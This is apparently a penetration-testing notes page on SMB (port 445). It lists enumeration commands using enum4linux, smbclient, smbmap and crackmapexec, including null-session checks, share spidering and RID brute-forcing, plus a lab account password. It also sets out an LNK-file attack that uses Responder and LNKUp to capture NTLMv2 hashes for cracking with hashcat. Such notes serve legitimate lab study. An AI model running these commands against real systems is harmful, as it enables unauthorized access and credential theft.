Samba / SMB (445)

Enumeration

enum4linux

enum4linux-ng -A $IP #run both enum4linux -A $IP

smbclient

smbclient -L 10.10.113.122 -U 'svc-admin' -p

smbclient //192.168.139.157/fox -U 'fox' -p

smbmap

smbmap -H 192.168.149.157 -u 'fox' -p 'iparalipomenidellabatracomiomachia'

crackmapexec

crackmapexec smb $target gives some initial info

crackmapexec smb $target -u '' -p '' # try a null session

crackmapexec smb $target -u 'guest' -p '' # can sometimes get some info

with valid account

crackmapexec smb $target -u $user -p $pass --shares

crackmapexec smb $target -u $user -p $pass -M spider_plus

crackmapexec smb $target -u $user -p $pass --rid-brute # may show other accounts

Exploitation

URI File Attack

If you can upload files to an SMB share, the files may render their icons. If this is an Active Directory computer, then you may be able to capture the NTLM hash during the icon loading attempt.

sudo responder -I tun0 -v

python2 /home/kali/tools/win/LNKUp/generate.py --host 192.168.49.187 --type ntlm --output link.lnk

You should now have the NTLMv2 hash which you can crack through hashcat (-m 5600).

PreviousNetBIOS (139)NextIMAP (143/993)

Last updated 3 years ago